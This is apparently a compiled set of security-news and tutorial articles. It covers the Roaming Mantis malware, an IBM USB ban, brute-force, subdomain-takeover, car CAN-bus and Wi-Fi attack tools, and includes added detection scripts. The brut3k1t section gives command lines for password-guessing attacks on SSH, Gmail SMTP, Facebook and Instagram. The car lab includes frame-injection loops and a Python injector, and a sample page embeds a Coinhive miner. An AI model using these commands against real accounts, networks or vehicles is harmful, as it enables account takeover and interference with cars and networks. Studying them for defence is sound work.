ROAMING MANTIS MALWARE EVOLVES TO PREY ON PC, ANDROID AND IOS USERS

Researchers recently described a DNS hijacking campaign that spreads a banking Trojan to Android smartphone users, mostly in Asia, and that has now extended its reach to iOS and PC users.

Roaming Mantis now targets iOS devices with phishing pages. A Kaspersky Lab publication in April described Roaming Mantis as a campaign that hijacks Android devices; the researchers say the malware is evolving and that its objective is to steal confidential data from the users it infects.


“The landing pages and apk files now support 27 languages covering Europe and the Middle East, and malicious actors added an option for phishing to iOS devices and cryptography capabilities for PCs,” says the Kaspersky Lab publication.

The campaign now has three capabilities: mining cryptocurrency on PCs, phishing iOS users, and infecting Android devices to steal information. Suguru Ishimaru, a Kaspersky Lab researcher, also analysed the earlier Roaming Mantis campaign and detailed the findings on the company's blog.

The landing pages now come in 27 languages, including English, Hindi, Russian, Chinese and Hebrew. The malware was initially distributed in only five languages; the range has since been widened with an automatic translator, the researchers note.


The campaign was designed to be distributed through DNS hijacking. For now it is most active in Asian countries such as Bangladesh, India, Japan and South Korea, although there are reports of it targeting devices in the Middle East and Europe.

Roaming Mantis works by hijacking DNS so that victims are redirected to a malicious web page, which serves a fake Facebook or Chrome application (‘facebook.apk’ or ‘chrome.apk’). This APK contains an Android banking Trojan and must be installed manually by the victim. The researchers also note that the comments in its code are written in simplified Chinese.

To target iOS devices, the campaign serves a page that mimics Apple's official website under the name ‘security.app.com’. The page asks the visitor for their Apple ID, password, card number, expiration date and CVV. This site supports 25 languages.

The researchers say Roaming Mantis can steal private and confidential data from both Apple and Android phones, and that the cryptocurrency mining is done by a script included in the HTML source of the landing page, which runs every time the page is opened in a browser.


The script is a Coinhive JavaScript miner that uses the device's CPU to mine Monero. The researchers note that Roaming Mantis's mining is quite subtle, since most users will not realise that their device's resources are being consumed.
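The in-page miner described above leaves recognisable artifacts in the HTML it is injected into. The following scanner is an added example (not Kaspersky's code and not part of the original article) that looks for the Coinhive loader URL, the CoinHive.Anonymous/CoinHive.User constructor with its site key, and the throttle option operators use to stay unnoticed. The two sample pages are constructed for the example; the site key in them is made up.

```python
import re
import sys
from dataclasses import dataclass
from typing import List, Optional

# Artifacts a Coinhive browser miner leaves in the HTML it is injected into:
# the loader script served from coinhive.com (also seen as coin-hive.com),
# the CoinHive.Anonymous / CoinHive.User constructor that carries the site
# key the mining proceeds are credited to, and the "throttle" option the
# operator uses to keep CPU usage low enough that victims do not notice.
LOADER_RE = re.compile(
    r"(?:coinhive|coin-hive)\.com/lib/coinhive(?:\.min)?\.js", re.IGNORECASE
)
CTOR_RE = re.compile(
    r"new\s+CoinHive\.(?:Anonymous|User)\s*\(\s*['\"]([A-Za-z0-9]{8,})['\"]",
    re.IGNORECASE,
)
THROTTLE_RE = re.compile(r"throttle\s*:\s*([0-9.]+)")


@dataclass
class Finding:
    kind: str       # "loader", "miner" or "throttle"
    evidence: str   # matched URL, site key or throttle value


def scan_html(html: str) -> List[Finding]:
    """Return every miner artifact found in one page's HTML (empty if clean)."""
    findings: List[Finding] = []
    for m in LOADER_RE.finditer(html):
        findings.append(Finding("loader", m.group(0)))
    for m in CTOR_RE.finditer(html):
        findings.append(Finding("miner", m.group(1)))
    # "throttle" on its own is a common word; only report it next to a miner.
    if any(f.kind == "miner" for f in findings):
        for m in THROTTLE_RE.finditer(html):
            findings.append(Finding("throttle", m.group(1)))
    return findings


def site_key(html: str) -> Optional[str]:
    """Site key of the first miner constructor: identifies who gets paid."""
    m = CTOR_RE.search(html)
    return m.group(1) if m else None


# Constructed sample pages for this example (not real captures).
SAMPLE_INFECTED = """<html><head><title>Facebook</title>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('AbCdEfGhIjKlMnOpQrStUvWxYz012345', {throttle: 0.3});
  miner.start();
</script></head><body></body></html>"""

SAMPLE_CLEAN = """<html><head><script src="/static/app.js"></script>
<script>var cfg = {throttle: 0.5};</script></head><body></body></html>"""


if __name__ == "__main__":
    # Usage: python coinhive_scan.py page1.html page2.html ...
    for path in sys.argv[1:]:
        with open(path, encoding="utf-8", errors="replace") as fh:
            for f in scan_html(fh.read()):
                print(f"{path}: {f.kind} {f.evidence}")
```

The site key is the most useful indicator to pivot on: every page the same operator injects carries the same key, so it ties separate landing pages to one campaign.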

So far more than 150 successful attacks have been observed, but this probably represents only a small fraction of the overall picture, since DNS hijacking is difficult to detect.


IBM IMPROVES ITS SECURITY AND PROHIBITS THE USE OF USB DRIVES THROUGHOUT THE COMPANY

IBM has banned all removable storage devices throughout the company, a new policy that aims to avoid the financial and reputational damage that a lost or misused USB drive can cause.

Shamla Naidoo, IBM’s chief information security officer, told staff in an internal email that the company “is expanding the practice of banning the transfer of data to all portable removable storage devices such as USB, SD card and flash drive”.

Some parts of the company already had this policy, but “in the coming weeks we are implementing this policy around the world,” said Naidoo.


The policy has a simple and well-justified objective in a world full of data breaches: “the possible financial and reputational damage due to misplaced, lost or misused removable portable storage devices should be minimized”, the CISO wrote.

Stuxnet is the classic example of malware written to jump from one machine to another on USB drives carried between them. Some of the networks it targeted were air-gapped, with no direct connection to the outside world, and the removable drive was the way in. To prevent the same thing on their own networks, security teams recommend device-control measures that block untrusted USB storage, so that malware cannot be introduced on a USB drive.


TOOL TO PERFORM BRUTE FORCE ATTACKS ON SSH, SMTP, FACEBOOK AND INSTAGRAM: BRUT3K1T

brut3k1t is a server-side brute-force module that supports dictionary attacks against various protocols.


The protocols currently complete and supported are:

  • ssh
  • ftp
  • smtp
  • XMPP
  • instagram
  • Facebook

Implementations of further protocols and services, including Twitter, are planned.

Installation is simple. brut3k1t requires several dependencies, which the program installs if they are missing:

  • argparse: used to parse command line arguments
  • paramiko: used for SSH connections and authentication
  • ftplib: used for FTP connections and authentication
  • smtplib: used for SMTP (email) connections and authentication
  • fbchat: used to connect to Facebook
  • selenium: used for web scraping, which is needed for Instagram (and later Twitter)
  • xmpppy: used for XMPP connections

Download it with git: git clone https://github.com/ex0dus-0x/brut3k1t

Change to directory:

cd /path/to/brut3k1t

Using brut3k1t is a little more involved than just running a Python file. Typing python brut3k1t.py -h shows the help menu.


Some usage examples. Cracking an SSH server running on 192.168.1.3 with the user root and wordlist.txt as the word list:

python brut3k1t.py -s ssh -a 192.168.1.3 -u root -w wordlist.txt

The port defaults to 22; if it is different, specify it with the -p flag.

Cracking the email account test@gmail.com with wordlist.txt on port 25 with a delay of 3 seconds between attempts. For email, the address must be that of the SMTP server, for example smtp.gmail.com for Gmail; a web search will turn it up for other providers.

python brut3k1t.py -s smtp -a smtp.gmail.com -u test@gmail.com -w wordlist.txt -p 25 -d 3

Cracking the XMPP account test@creep.im with wordlist.txt on port 5222. XMPP is similar to SMTP: you must provide the XMPP server address, here creep.im.

python brut3k1t.py -s xmpp -a creep.im -u test -w wordlist.txt

Cracking Facebook is more involved: it requires the target's numeric user ID, not the username.

python brut3k1t.py -s facebook -u 1234567890 -w wordlist.txt

Cracking Instagram with the username test, wordlist.txt and a 5 second delay:

python brut3k1t.py -s instagram -u test -w wordlist.txt -d 5

Some notes to keep in mind. Use this article for educational purposes, for studying the code and for security-oriented practice.

If the port flag -p is not provided, the default port for that service is used. It is not needed for Facebook and Instagram.

If the delay flag -d is absent, the default delay is 1 second.

Use the SMTP server address and the XMPP server address for -a with SMTP and XMPP respectively.

Services do not always run on their default port; an FTP server, for example, may not be on port 21.
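What a dictionary attack like the SSH example above looks like from the target's side: a burst of failed logins from one source, sometimes followed by an accepted one. The following detector is an added example (not part of brut3k1t or of the original article) that reads sshd lines in the format Debian and Ubuntu write to /var/log/auth.log, flags sources with a configurable number of failures inside a time window, and reports any successful login from a source that was already bursting. The log lines are constructed for the example, the year is assumed because syslog timestamps carry none, and the thresholds are illustrative.

```python
import re
import sys
from collections import defaultdict, deque
from datetime import datetime
from typing import Deque, Dict, List, Set, Tuple

# sshd lines as written to /var/log/auth.log on Debian/Ubuntu. Constructed for
# this example; the addresses come from the documentation ranges.
SAMPLE_AUTH_LOG = """\
May 11 10:02:01 host sshd[2001]: Failed password for root from 203.0.113.7 port 51001 ssh2
May 11 10:02:02 host sshd[2001]: Failed password for root from 203.0.113.7 port 51002 ssh2
May 11 10:02:03 host sshd[2001]: Failed password for root from 203.0.113.7 port 51003 ssh2
May 11 10:02:04 host sshd[2001]: Failed password for invalid user admin from 203.0.113.7 port 51004 ssh2
May 11 10:02:05 host sshd[2001]: Failed password for root from 203.0.113.7 port 51005 ssh2
May 11 10:02:06 host sshd[2001]: Accepted password for root from 203.0.113.7 port 51006 ssh2
May 11 10:30:00 host sshd[2044]: Failed password for alice from 198.51.100.9 port 40022 ssh2
May 11 10:31:00 host sshd[2050]: Accepted publickey for alice from 198.51.100.9 port 40023 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

# syslog timestamps carry no year; assume the year of the log being read.
LOG_YEAR = 2018

Event = Tuple[datetime, str, str, str]   # (time, result, user, source ip)


def parse_auth_log(text: str) -> List[Event]:
    events: List[Event] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue   # other daemons, or sshd messages we do not score
        ts = datetime.strptime(f"{LOG_YEAR} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["user"], m["ip"]))
    return events


def detect_bruteforce(
    text: str, threshold: int = 5, window_s: int = 60
) -> Tuple[Set[str], List[Tuple[str, str]]]:
    """Return (sources with >= threshold failures inside window_s seconds,
    [(source, user)] for every successful login from such a source)."""
    recent: Dict[str, Deque[datetime]] = defaultdict(deque)
    bursting: Set[str] = set()
    successes_after_burst: List[Tuple[str, str]] = []
    for ts, result, user, ip in parse_auth_log(text):
        q = recent[ip]
        if result == "Failed":
            q.append(ts)
            # slide the window: forget failures older than window_s
            while q and (ts - q[0]).total_seconds() > window_s:
                q.popleft()
            if len(q) >= threshold:
                bursting.add(ip)
        elif ip in bursting:
            # a success from a source that was already guessing: the
            # dictionary attack most likely worked, escalate this one
            successes_after_burst.append((ip, user))
    return bursting, successes_after_burst


if __name__ == "__main__":
    # Usage: python ssh_bruteforce.py /var/log/auth.log
    data = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_AUTH_LOG
    sources, hits = detect_bruteforce(data)
    for ip in sorted(sources):
        print(f"brute force from {ip}")
    for ip, user in hits:
        print(f"ALERT: login as {user} from {ip} after a failure burst")
```

The -d delay flag in brut3k1t exists precisely to stay under thresholds like this one; a detector that only counts failures per minute will miss a slow attack, which is why the success-after-burst rule is kept separate from the rate rule.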


HOW TO MAKE A SUBDOMAIN TAKEOVER ATTACK

Subdomain takeover vulnerabilities happen whenever a subdomain points to a service (for example GitHub Pages or Heroku) that has since been deleted or deprovisioned. An attacker can then set up a page on that service and point it at the subdomain. For example, if subdomain.example.com pointed to a GitHub Pages site and the owner deleted that site without removing the DNS record, an attacker could create a new GitHub Pages site, add a CNAME file containing subdomain.example.com and claim the name.


Say www.testing.com points to a GitHub Pages site. If the owner deletes https://github.com/test0x01/testing but does not delete the DNS entry pointing at it, anyone can claim the name on GitHub and publish content at www.testing.com.

Attackers use subdomain scraping and brute-force tools such as Sublist3r to find a target's subdomains, then check the DNS records and/or run a screenshot script to spot vulnerable ones. A subdomain that points to GitHub Pages and returns a 404 is an indicator that it can be claimed on GitHub.


Sublist3r is a Python tool designed to enumerate the subdomains of websites using OSINT. It helps penetration testers and bug hunters collect subdomains for the domain they are targeting. Sublist3r enumerates subdomains using many search engines such as Google, Yahoo, Bing, Baidu and Ask, and also using Netcraft, VirusTotal, ThreatCrowd, DNSdumpster and ReverseDNS.

subbrute was integrated into Sublist3r to increase the chance of finding more subdomains by brute force with an improved word list.

Installation: git clone https://github.com/aboul3la/Sublist3r.git


On the security impact: a subdomain takeover lets an attacker publish content on the subdomain. Where the subdomain is under the organisation's base domain, the attacker can also read and set cookies scoped to the base domain: subdomain.example.com can set cookies for example.com.

A real case is Frans Rosén's takeover of inside.gratipay.com. Rather than posting content on the landing page, Frans posted a page on a hidden path (login123); this is the right way to demonstrate the issue without damaging the company's image.

To make sure nobody can take over a subdomain, remove the DNS entry pointing at the deleted service.
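The check described above (follow the CNAME, see whether it lands on a claimable service, and look for the service's "unclaimed" page) as an added example, not code from the original article or from Sublist3r. The DNS and HTTP answers are constructed so it runs offline; plug in a real resolver and HTTP client for a live scan. The fingerprint strings for GitHub Pages and Heroku are the ones takeover scanners commonly use and are an assumption here: verify them against the live service before relying on them.

```python
from typing import Callable, Dict, List, Optional, Tuple

# Hosting services the article mentions whose names anyone can claim once the
# original tenant deletes their site, with the text each returns for an
# unclaimed name (assumption: check against the live services).
FINGERPRINTS: Dict[str, str] = {
    "github.io": "There isn't a GitHub Pages site here.",
    "herokuapp.com": "No such app",
}

Resolver = Callable[[str], Optional[str]]     # host -> CNAME target, or None
Fetcher = Callable[[str], Tuple[int, str]]    # host -> (HTTP status, body)


def follow_cname(host: str, resolve: Resolver, max_hops: int = 8) -> str:
    """Follow host's CNAME chain and return the final name it points to."""
    seen = {host}
    cur = host
    for _ in range(max_hops):
        target = resolve(cur)
        if target is None:
            return cur
        if target in seen:
            raise ValueError(f"CNAME loop at {target}")
        seen.add(target)
        cur = target
    raise ValueError(f"CNAME chain from {host} longer than {max_hops} hops")


def check_subdomain(host: str, resolve: Resolver, fetch: Fetcher) -> Tuple[str, str]:
    """Return (verdict, final_target). Verdicts:
    not-applicable: the target is not on a claimable service
    in-use:         the target is on such a service and the site exists
    vulnerable:     the target is on such a service and serves its
                    'unclaimed' page, so anyone can register the name"""
    target = follow_cname(host, resolve).rstrip(".").lower()
    for suffix, marker in FINGERPRINTS.items():
        if target == suffix or target.endswith("." + suffix):
            _status, body = fetch(host)
            return ("vulnerable" if marker in body else "in-use"), target
    return "not-applicable", target


def scan(hosts: List[str], resolve: Resolver, fetch: Fetcher) -> Dict[str, Tuple[str, str]]:
    return {h: check_subdomain(h, resolve, fetch) for h in hosts}


# Constructed answers so the example runs offline (not real DNS data).
MOCK_DNS = {
    "www.testing.com": "test0x01.github.io.",
    "app.testing.com": "testing-prod.herokuapp.com.",
    "blog.testing.com": "testing.ghost.io.",
}
MOCK_HTTP = {
    "www.testing.com": (404, "<h1>404</h1><p>There isn't a GitHub Pages site here.</p>"),
    "app.testing.com": (200, "<h1>Welcome to Testing</h1>"),
    "blog.testing.com": (200, "<h1>Blog</h1>"),
}


def mock_resolve(host: str) -> Optional[str]:
    return MOCK_DNS.get(host)


def mock_fetch(host: str) -> Tuple[int, str]:
    return MOCK_HTTP.get(host, (0, ""))


if __name__ == "__main__":
    for host, (verdict, target) in scan(list(MOCK_DNS), mock_resolve, mock_fetch).items():
        print(f"{host:20} -> {target:30} {verdict}")
```

Two details matter in practice: fetch the original hostname, not the CNAME target, because the hosting service decides what to serve by the Host header; and keep the CNAME-loop guard, since dangling records in neglected zones are exactly where loops and long chains turn up.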



HOW TO HACK ANY CAR WITH THIS TOOL

First, the topics this car hacking course covers: setting up a virtual environment for testing, sniffing CAN traffic, analysing CAN traffic, reverse engineering CAN IDs, denial of service attacks, replay and traffic injection, coding your own CAN socket tools in Python, attacks targeted at your car's components, and moving on to attacking a real car with hardware.

Before going into the specifics of vehicle hacking, we explain what CAN is by building a lab: we will run a simple simulated CAN bus network that controls several features of a simulated car. It is better to learn by doing than to sit through a list of network terms.

You are not expected to buy much hardware or plug into your real car straight away; the options below let you start hacking cars by following this tutorial.

To begin, set up an Ubuntu installation in VMware and boot it. Optionally you could use a Kali Linux VM, but you may run into copy problems, and Kayak was reported to have installation problems on it. Kali is known to work fine with the OpenGarages virtual car (ICSim).

Install prerequisite libraries: once the VM is up, install the CAN utilities and prerequisite libraries with the following apt-get commands:

sudo apt-get update

sudo apt-get install libsdl2-dev libsdl2-image-dev can-utils

Then clone the ICSim repository:

git clone https://github.com/zombieCraig/ICSim.git

Start the simulator: change into the cloned repository and run the following two commands, which set up a virtual CAN interface and start the instrument cluster GUI.

Run the configuration script to get the vcan0 interface:

root@kali:~/ICSim# ./setup_vcan.sh

root@kali:~/ICSim# ./icsim vcan0

In a new terminal tab, open the simulator controller with the following command:

root@kali:~/ICSim# ./controls vcan0

The controller window must be the GUI window in focus for keyboard commands to reach the simulator.


Using the simulator: it has a speedometer, left and right turn signals, doors and so on. When the control panel is focused, the following keys control it:

  • Up and Down arrows control the speedometer in the instrument cluster
  • Left and Right arrows control the turn signals
  • Right Shift + X, A or B opens a door
  • Left Shift + X, A or B closes a door

Experiment with the commands above; with Right Shift + X, for example, you will see the interface change.

Now you have your own car to hack. Note that the setup commands above use a vcan0 interface. Run ifconfig and you will see a new network interface that talks to the CAN network through vcan0:

ficti0n@ubuntu:~/Desktop/ICSim$ ifconfig vcan0
vcan0     Link encap:UNSPEC  HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
          UP RUNNING NOARP  MTU:16  Metric:1
          RX packets:558904 errors:0 dropped:0 overruns:0 frame:0
          TX packets:558904 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1
          RX bytes:3663935 (3.6 MB)  TX bytes:3663935 (3.6 MB)

Car networks run a variety of protocols, the most common being CAN. You can think of a CAN bus as a network hub where everybody sees everyone else's traffic. That is true up to a point: you may not see all the traffic if you are not connected to that particular bus. CAN traffic is similar to UDP in that it is fire-and-forget; the main difference is that CAN nodes have no addresses, and everything works on frame IDs and arbitration priority.

Now let's check that we can see CAN traffic from our virtual car with the candump utility, installed above as part of the can-utils package. Running it on the vcan0 interface the simulator uses shows a stream of traffic:

ficti0n@ubuntu:~/Desktop/ICSim$ candump vcan0


We can now see CAN frames, and if we perform actions in the vehicle we will see the data values change in the candump output. This happens very quickly, however, and we may not be able to tell whether we have unlocked our simulator's door, because things change constantly even while a car is idle.

Capturing and replaying CAN actions: one option is to perform an action and replay it. You should see the action happen again on replay, provided the traffic for the action we recorded is on the same bus our device is connected to. There are many networks inside a car, and there is no guarantee our tap (an OBD2 port connector, say) is on the same bus as the door we opened.

Another useful tool in can-utils is canplayer, which replays traffic. If the functionality we want to capture is on the same bus as the adapter connected to the car, or in this case our virtual CAN interface, we use candump to save the traffic to a file and then canplayer to replay it on the network. For example: run candump, open a door, then replay the action with canplayer.

Lab 1 steps:

  • Run candump
  • Right Shift + X to open a door
  • Stop candump (Ctrl+C)
  • Left Shift + X to close the door
  • Run canplayer with the saved dump; it replays the traffic and opens the door

Record the door opening (-l logs to a file):

ficti0n@ubuntu:~/Desktop/ICSim$ candump -l vcan0

Replay the candump file (use the file created by your own candump run):

ficti0n@ubuntu:~/Desktop/ICSim$ canplayer -I candump-2018-04-06_154441.log

At this point your door should open again. CAN networks are not like TCP/IP; they are more like UDP in that you send your request and do not expect a response. If a frame is lost you simply have to send it again. If the door did not open, it is likely that something with higher priority was being sent on the network at the moment of the replay and your traffic was overshadowed by it.


Interacting with the CAN bus and reversing traffic: this is good, but candump is not very useful here, because it moves too fast to learn much from. Instead we use cansniffer with coloured output, which shows us the bytes inside frames that change.

To start cansniffer, run the following:

ficti0n@ubuntu:~/Desktop/ICSim$ cansniffer -c vcan0


You will now see Time, ID and Data columns. The important ones for our purposes are ID and Data.

The frame ID is associated with the device on the network that sends the frame, and it also determines the frame's priority on the network: the smaller the CAN ID, the higher its priority and the more likely it is to be handled first. The data field carries the information that changes some parameter, such as unlocking a door or updating the speed. The values in red are those changing during the idle state the car is currently in.

Determining which ID and byte control the accelerator: with the cansniffer terminal open, bring the simulator and controller to the foreground, with the controller as the selected window. Watch the cansniffer output while pressing the Up arrow and look for a value that was white, is now red, and increases as the accelerator goes up.


Selecting values with filters: to isolate the accelerator value, click on the terminal window and type -000000 followed by Enter, which clears all the IDs being displayed. Then type +244 followed by Enter, which adds the accelerator ID back. Now click on the controller again and increase the speed with the Up arrow without all the noise obscuring your view; only ID 244 will appear in your output.


To get all the IDs back, click on the terminal window and enter +000000 followed by Enter; you should see the full output as before. Essentially 000000 means everything: with a minus sign in front it removes everything and clears your terminal window, with a plus sign it adds everything back.

Determining the blinker ID: to find the ID for the turn signals, press the left or right arrow with the control window selected. A completely new ID, 188, appears in the list; this ID is associated with the turn signals.


This ID did not appear earlier because it was not sent until you pressed the turn signal control. Isolate it by typing -000000 followed by +188. As with the accelerator, your terminal should now show only ID 188, initially with all bytes at 00.

Pressing the left and right turn signals, you can see the first byte change from 00 to 01 or 02. If neither is pressed it is 00. The ID remains visible with 00 until its timeout expires, then disappears from the list when it is no longer active.

Now it is time for some protocol reversing. This lab gives you an idea of how to reverse all the car's functions and associate each action with the correct ID and byte, producing a map of the changes for each function. We have already seen how to determine which byte and ID correspond to an action; now map all the remaining functions before moving on to attacking individual components.

Attacking the functionality: with all the functions mapped, we can now address devices on the network directly without touching the controller GUI. Perhaps we got into the car through its OnStar cellular connection, or through a head unit whose BLE connection was bridged to the CAN network in some way.

After such an exploit we have direct access to the CAN network and want to take action. Or perhaps we installed a wireless device in the OBD2 port under the dashboard.

Using the data from the CAN reversing lab, we can trigger these actions directly with the appropriate CAN ID and bytes. Since we are remote from the target, we cannot reach out and grab the steering wheel or press the accelerator; instead we send the CAN frame that makes the change.

One way to do this is the cansend utility. Taking the information from the lab above, make the left turn signal flash by sending ID 188 with the first byte set to 01, which indicates the left signal is pressed. cansend uses the ID#DATA format:

ficti0n@ubuntu:~/Desktop/ICSim$ cansend vcan0 188#01000000


You should have noticed the left signal flash. If not, try again and make sure you used the correct ID and changed the correct byte. Now do the same with the accelerator, trying to set the speed with ID 244, which we determined was the accelerator:

ficti0n@ubuntu:~/Desktop/ICSim$ cansend vcan0 244#00000011F6

Nothing visible will happen, because a single frame is so quick that the needle does not jump to that value. So try repeating it over and over with a bash loop:

ficti0n@ubuntu:~/Desktop/ICSim$ while true; do cansend vcan0 244#00000011F6; done


Now you should notice the needle jump back and forth a little. It bounces because the normal CAN traffic sent between your frames keeps telling the car that the speed is actually 00, while your value 11 means about 30 mph. The speed reading has changed and the turn signal has come on without using the normal controls.

One way around this is to monitor the CAN network and, whenever a given ID is seen, immediately send the same ID with a different value. Here we try to override the speed output by reacting to changes: we run candump and watch its output for ID 244, the accelerator value that tells the car its speed. Whenever a device in the car reports ID 244 and its value, we immediately send our own value saying the speed is 30 mph (value 11):

ficti0n@ubuntu:~/Desktop/ICSim$ candump vcan0 | grep " 244 " | while read line; do cansend vcan0 244#00000011F6; done

After a few seconds you will see the speed settle at around 30 MPH, as each legitimate ID 244 frame on the network is followed immediately by your own.

With the command above still running, click on the controller window and hold the Up arrow with the controller in focus. After a few seconds, as the speed exceeds 30 MPH, you will see the needle fight between the real, higher value and 30 MPH, as your command keeps sending its value to replace the actual speed.

This is a crude way to monitor the network and react to what you see. Perhaps someone stole your car and you want to watch for a door being opened, and lock it again immediately if they try.
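The course's "coding your own CAN socket tools in Python" topic, as an added example that is not part of ICSim or of the original article. It does in Python what the labs above do with can-utils: it parses a candump -l log, finds the byte offsets that change per ID the way cansniffer's red highlighting does, packs and unpacks the 16-byte SocketCAN frame format, and implements the reactive injector from the candump | grep | cansend loop directly on a raw CAN socket. The capture is constructed to mimic the accelerator (244) and turn-signal (188) frames discussed above; the socket functions need a Linux host with vcan0 up, everything else runs offline.

```python
import socket
import struct
import sys
from collections import defaultdict
from typing import Dict, List, Tuple

# Wire layout of a classic SocketCAN frame (struct can_frame): 32-bit CAN ID
# with flag bits, 8-bit DLC, 3 bytes padding, 8 data bytes. This is the
# layout Python's socket(AF_CAN, SOCK_RAW, CAN_RAW) reads and writes.
CAN_FRAME_FMT = "=IB3x8s"
CAN_FRAME_SIZE = struct.calcsize(CAN_FRAME_FMT)   # 16 bytes
CAN_ID_MASK = 0x1FFFFFFF                            # strips EFF/RTR/ERR flags

# A short capture in candump -l format, constructed for this example to mimic
# the accelerator (ID 244) and turn-signal (ID 188) frames discussed above.
SAMPLE_LOG = """\
(1523045081.100000) vcan0 244#00000000F6
(1523045081.100500) vcan0 19B#000000000000
(1523045081.101000) vcan0 244#00000005F6
(1523045081.101500) vcan0 188#00000000
(1523045081.102000) vcan0 244#0000000AF6
(1523045081.102500) vcan0 188#01000000
(1523045081.103000) vcan0 244#00000011F6
"""

Frame = Tuple[int, bytes]


def parse_candump_log(text: str) -> List[Frame]:
    """Parse '(timestamp) iface ID#DATA' lines into (can_id, data) frames."""
    frames: List[Frame] = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3 or "#" not in parts[2]:
            continue
        ident, _, data_hex = parts[2].partition("#")
        frames.append((int(ident, 16), bytes.fromhex(data_hex)))
    return frames


def changing_bytes(frames: List[Frame]) -> Dict[int, List[int]]:
    """What cansniffer colours red: for each ID, the byte offsets that take more
    than one value across the capture. Bytes that never change are idle noise."""
    values: Dict[int, Dict[int, set]] = defaultdict(lambda: defaultdict(set))
    for can_id, data in frames:
        for offset, byte in enumerate(data):
            values[can_id][offset].add(byte)
    return {
        can_id: sorted(off for off, seen in offs.items() if len(seen) > 1)
        for can_id, offs in values.items()
    }


def pack_frame(can_id: int, data: bytes) -> bytes:
    """Build the 16-byte struct can_frame for a cansend-style 'ID#DATA' pair."""
    if len(data) > 8:
        raise ValueError("classic CAN carries at most 8 data bytes")
    return struct.pack(CAN_FRAME_FMT, can_id, len(data), data.ljust(8, b"\x00"))


def unpack_frame(raw: bytes) -> Frame:
    can_id, dlc, data = struct.unpack(CAN_FRAME_FMT, raw)
    return can_id & CAN_ID_MASK, data[:dlc]


def open_can(iface: str) -> socket.socket:
    """Raw SocketCAN socket bound to one interface (Linux only)."""
    sock = socket.socket(socket.AF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
    sock.bind((iface,))
    return sock


def override_on_sight(iface: str, can_id: int, data: bytes, max_sends: int = 0) -> int:
    """Reactive injector: each time the bus carries can_id, immediately send our
    own frame with the same ID so that our value is always the last one seen.
    This is the candump | grep | cansend loop without the shell round trip."""
    sock = open_can(iface)
    ours = pack_frame(can_id, data)
    sent = 0
    while max_sends == 0 or sent < max_sends:
        seen_id, _ = unpack_frame(sock.recv(CAN_FRAME_SIZE))
        if seen_id == can_id:
            sock.send(ours)
            sent += 1
    return sent


if __name__ == "__main__":
    # Offline: report what changes in the sample capture.
    for cid, offs in sorted(changing_bytes(parse_candump_log(SAMPLE_LOG)).items()):
        print(f"ID {cid:03X}: changing byte offsets {offs}")
    # With the simulator running on Linux: python can_tools.py vcan0
    if len(sys.argv) > 1:
        override_on_sight(sys.argv[1], 0x244, bytes.fromhex("00000011F6"))
```

Note that cansend and candump print IDs in hex, so the accelerator ID "244" from the labs is 0x244 in code. Reacting from inside one process rather than spawning cansend per frame also closes most of the gap that lets the real value show on the needle between your frames.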


HACK ANY WIRELESS NETWORK USING ALL IN ONE TOOL: HIJACKER

Hijacker is a graphical user interface for the penetration testing tools Aircrack-ng, Airodump-ng, MDK3 and Reaver. It offers a simple, easy-to-use interface for running these tools without typing commands in a console and copying and pasting MAC addresses.

The application requires an ARM Android device with an internal wireless adapter that supports monitor mode. Some Android devices can do this, but none natively, which means you need custom firmware. A device using the BCM4339 chipset (MSM8974, such as the Nexus 5, Xperia Z1/Z2, LG G2, LG G Flex and Samsung Galaxy Note 3) will work with Nexmon. Devices using the BCM4330 can use bcmon.

An alternative is an external adapter that supports monitor mode on Android, connected with an OTG cable.

The necessary tools are included for armv7l and aarch64 devices as of version 1.1, along with the Nexmon driver and management utility for the BCM4339 and BCM4358.

Root access is also required, since these tools need root to function.

Features

Information gathering

  • See a list of access points and stations (clients) around you, including hidden ones
  • View the activity of a specific network by measuring beacons and data packets, and its clients
  • Statistics on access points and stations
  • Look up the manufacturer of a device in the OUI database
  • See the signal strength of devices and filter the ones closest to you
  • Save captured packets to a .cap file

Attacks

  • Deauthenticate all the clients of a network, either each one individually or without a specific target
  • Deauthenticate a specific client from the network it is connected to
  • MDK3 beacon flooding with custom options and an SSID list
  • MDK3 authentication DoS against a specific network or every nearby AP
  • Capture a WPA handshake, or gather IVs to crack a WEP network
  • Reaver WPS cracking

Other

  • Leave the application running in the background, optionally with a notification
  • Copy commands or MAC addresses to the clipboard
  • Includes the necessary tools, with no manual installation needed
  • Includes the Nexmon driver, the required library and the management utility for BCM4339 and BCM4358 devices
  • Set commands to enable and disable monitor mode automatically
  • Crack .cap files with a custom word list
  • Create custom actions and run them easily against an access point or client
  • Sort and filter access points and stations by many parameters
  • Export all collected information to a file
  • Add a persistent alias to a device for easier identification


For the installation, make sure that:

  • you are on Android 5+
  • your device is rooted; SuperSU is required (on CM/LineageOS install SuperSU)
  • you have firmware that supports monitor mode on your wireless interface

When you run Hijacker for the first time, you are asked whether to install the Nexmon firmware or go to the home screen. If you have already installed your firmware or use an external adapter, go to the home screen. Otherwise, if your device is supported, tap ‘Install Nexmon’ and then ‘Install’. You then land on the home screen and airodump starts. Make sure Wi-Fi is enabled and in monitor mode.

Note that on some devices, changing files in /system can trigger an Android security feature and your system partition will be restored when you reboot.

Troubleshooting: this application is designed and tested for ARM devices; all the included binaries are compiled for that architecture and will not work on anything else. You can check whether your device is supported in Settings: if you have the option to install Nexmon, you are on the right architecture. Otherwise you will have to install all the tools manually (busybox, the aircrack-ng suite, mdk3, reaver, wireless tools and the libfakeioctl.so library) in a directory on the PATH, and set the ‘Prefix’ option so the tools preload the library they need: LD_PRELOAD=/path/to/libfakeioctl.so.

